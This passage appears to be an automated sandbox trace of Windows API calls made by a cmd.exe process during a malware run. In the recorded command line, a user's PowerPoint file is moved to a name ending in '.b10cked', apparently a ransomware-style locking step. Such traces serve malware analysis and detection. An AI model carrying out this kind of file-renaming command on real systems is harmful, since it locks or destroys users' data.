0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 34737 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 34738 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Thread: id = 855 os_tid = 0xe7c [0231.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fbf4 | out: lpSystemTimeAsFileTime=0x20fbf4*(dwLowDateTime=0xbdc67e60, dwHighDateTime=0x1d440a9)) [0231.896] GetCurrentProcessId () returned 0xe80 [0231.896] GetCurrentThreadId () returned 0xe7c [0231.896] GetTickCount () returned 0x3fcf4 [0231.896] QueryPerformanceCounter (in: lpPerformanceCount=0x20fbec | out: lpPerformanceCount=0x20fbec*=28868485354) returned 1 [0231.897] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.897] __set_app_type (_Type=0x1) [0231.897] __p__fmode () returned 0x76b331f4 [0231.897] __p__commode () returned 0x76b331fc [0231.897] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.897] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.897] GetCurrentThreadId () returned 0xe7c [0231.897] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe7c) returned 0x38 [0231.897] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.897] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.897] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.922] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.922] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fb84 | out: phkResult=0x20fb84*=0x0) returned 0x2 [0231.922] VirtualQuery (in: lpAddress=0x20fbbb, lpBuffer=0x20fb54, dwLength=0x1c | out: lpBuffer=0x20fb54*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fb54, dwLength=0x1c | out: lpBuffer=0x20fb54*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fb54, dwLength=0x1c | out: lpBuffer=0x20fb54*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fb54, dwLength=0x1c | out: lpBuffer=0x20fb54*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fb54, dwLength=0x1c | out: lpBuffer=0x20fb54*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.922] GetConsoleOutputCP () returned 0x1b5 [0231.924] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.925] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.925] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.927] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.929] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.929] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.959] GetEnvironmentStringsW () returned 0x300168* [0231.959] FreeEnvironmentStringsW (penv=0x300168) returned 1 [0231.959] GetEnvironmentStringsW () returned 0x300168* [0231.959] FreeEnvironmentStringsW (penv=0x300168) returned 1 [0231.959] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eaf4 | out: phkResult=0x20eaf4*=0x40) returned 0x0 [0231.959] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x0, lpData=0x20eb00*=0x90, lpcbData=0x20eaf8*=0x1000) returned 0x2 [0231.959] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x4, lpData=0x20eb00*=0x1, lpcbData=0x20eaf8*=0x4) returned 0x0 [0231.959] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x0, lpData=0x20eb00*=0x1, lpcbData=0x20eaf8*=0x1000) returned 0x2 [0231.959] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x4, lpData=0x20eb00*=0x0, lpcbData=0x20eaf8*=0x4) returned 0x0 [0231.959] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x4, lpData=0x20eb00*=0x40, lpcbData=0x20eaf8*=0x4) returned 0x0 [0231.959] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x4, lpData=0x20eb00*=0x40, lpcbData=0x20eaf8*=0x4) returned 0x0 [0231.960] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x0, lpData=0x20eb00*=0x40, lpcbData=0x20eaf8*=0x1000) returned 0x2 [0231.960] RegCloseKey (hKey=0x40) returned 0x0 [0231.960] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eaf4 | out: phkResult=0x20eaf4*=0x40) returned 0x0 [0231.960] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x0, lpData=0x20eb00*=0x40, lpcbData=0x20eaf8*=0x1000) returned 0x2 [0231.960] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x4, lpData=0x20eb00*=0x1, lpcbData=0x20eaf8*=0x4) returned 0x0 [0231.960] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x0, lpData=0x20eb00*=0x1, lpcbData=0x20eaf8*=0x1000) returned 0x2 [0231.960] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x4, lpData=0x20eb00*=0x0, lpcbData=0x20eaf8*=0x4) returned 0x0 [0231.960] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x4, lpData=0x20eb00*=0x9, lpcbData=0x20eaf8*=0x4) returned 0x0 [0231.960] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x4, lpData=0x20eb00*=0x9, lpcbData=0x20eaf8*=0x4) returned 0x0 [0231.960] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x0, lpData=0x20eb00*=0x9, lpcbData=0x20eaf8*=0x1000) returned 0x2 [0231.960] RegCloseKey (hKey=0x40) returned 0x0 [0231.960] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.960] srand (_Seed=0x5b8863bf) [0231.960] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked\"" [0231.960] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked\"" [0231.961] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.961] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3018c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.961] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.961] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.961] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.961] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.961] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.961] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.961] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.961] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.961] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.961] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.961] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.962] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.962] GetEnvironmentStringsW () returned 0x3022b8* [0231.962] FreeEnvironmentStringsW (penv=0x3022b8) returned 1 [0231.962] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.962] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.962] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.962] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.962] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.962] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.962] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.962] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.962] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.962] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.962] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f8c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.962] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f8c0, lpFilePart=0x20f8bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f8bc*="Desktop") returned 0x18 [0231.962] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.963] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f63c | out: lpFindFileData=0x20f63c) returned 0x2ffff8 [0231.963] FindClose (in: hFindFile=0x2ffff8 | out: hFindFile=0x2ffff8) returned 1 [0231.963] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f63c | out: lpFindFileData=0x20f63c) returned 0x2ffff8 [0231.963] FindClose (in: hFindFile=0x2ffff8 | out: hFindFile=0x2ffff8) returned 1 [0231.963] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f63c | out: lpFindFileData=0x20f63c) returned 0x2ffff8 [0231.963] FindClose (in: hFindFile=0x2ffff8 | out: hFindFile=0x2ffff8) returned 1 [0231.963] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.963] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.963] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.964] GetEnvironmentStringsW () returned 0x302ad8* [0231.964] FreeEnvironmentStringsW (penv=0x302ad8) returned 1 [0231.964] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.964] GetConsoleOutputCP () returned 0x1b5 [0231.979] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.979] GetUserDefaultLCID () returned 0x409 [0231.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fa00, cchData=128 | out: lpLCData="0") returned 2 [0231.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fa00, cchData=128 | out: lpLCData="0") returned 2 [0231.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fa00, cchData=128 | out: lpLCData="1") returned 2 [0231.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.992] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.993] GetConsoleTitleW (in: lpConsoleTitle=0x2f08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.032] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.032] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.032] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.032] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.033] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.033] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0232.033] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.033] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.033] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.033] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.033] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.036] GetConsoleTitleW (in: lpConsoleTitle=0x20f6f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.098] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.098] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.098] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.098] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.098] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.098] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.098] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.098] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.098] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.098] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.098] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.098] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.098] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.098] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.098] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.098] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.098] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.098] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.098] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.098] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.098] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.098] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.098] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0232.098] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.098] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.098] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.098] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.099] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.099] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.099] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.099] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.099] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.099] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.099] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.099] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.101] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.101] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.101] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f4b4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f4ac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f4ac*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.101] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.101] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.101] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.101] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.101] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.101] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.102] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.103] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.103] _wcsicmp (_String1="1UB93Z~1.PPT", _String2=".") returned 3 [0232.103] _wcsicmp (_String1="1UB93Z~1.PPT", _String2="..") returned 3 [0232.103] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\1ub93z~1.ppt")) returned 0x20 [0232.103] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x301d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.103] SetErrorMode (uMode=0x0) returned 0x0 [0232.103] SetErrorMode (uMode=0x1) returned 0x0 [0232.103] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT", nBufferLength=0x104, lpBuffer=0x20ee3c, lpFilePart=0x20ee24 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT", lpFilePart=0x20ee24*="1UB93Z~1.PPT") returned 0x26 [0232.103] SetErrorMode (uMode=0x0) returned 0x1 [0232.104] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0232.104] _wcsicmp (_String1="1UB93Z~1.PPT", _String2=".") returned 3 [0232.104] _wcsicmp (_String1="1UB93Z~1.PPT", _String2="..") returned 3 [0232.104] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\1ub93z~1.ppt")) returned 0x20 [0232.104] SetErrorMode (uMode=0x0) returned 0x0 [0232.104] SetErrorMode (uMode=0x1) returned 0x0 [0232.104] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT", nBufferLength=0x104, lpBuffer=0x20f2b8, lpFilePart=0x20f050 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT", lpFilePart=0x20f050*="1UB93Z~1.PPT") returned 0x26 [0232.104] SetErrorMode (uMode=0x0) returned 0x1 [0232.104] SetErrorMode (uMode=0x0) returned 0x0 [0232.104] SetErrorMode (uMode=0x1) returned 0x0 [0232.104] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x20f4c0, lpFilePart=0x20f050 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked", lpFilePart=0x20f050*="1uB93z-ou.pptx.b10cked") returned 0x30 [0232.104] SetErrorMode (uMode=0x0) returned 0x1 [0232.104] SetLastError (dwErrCode=0x0) [0232.105] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\1ub93z-ou.pptx.b10cked")) returned 0xffffffff [0232.105] GetLastError () returned 0x2 [0232.105] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x20e9cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e9cc) returned 0x2f0ef8 [0232.105] FindNextFileW (in: hFindFile=0x2f0ef8, lpFindFileData=0x20e9cc | out: lpFindFileData=0x20e9cc) returned 0 [0232.115] GetLastError () returned 0x12 [0232.115] FindClose (in: hFindFile=0x2f0ef8 | out: hFindFile=0x2f0ef8) returned 1 [0232.116] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x301ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301ae0) returned 0x2f0ef8 [0232.116] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x20ec64, lpFilePart=0x0 | out: 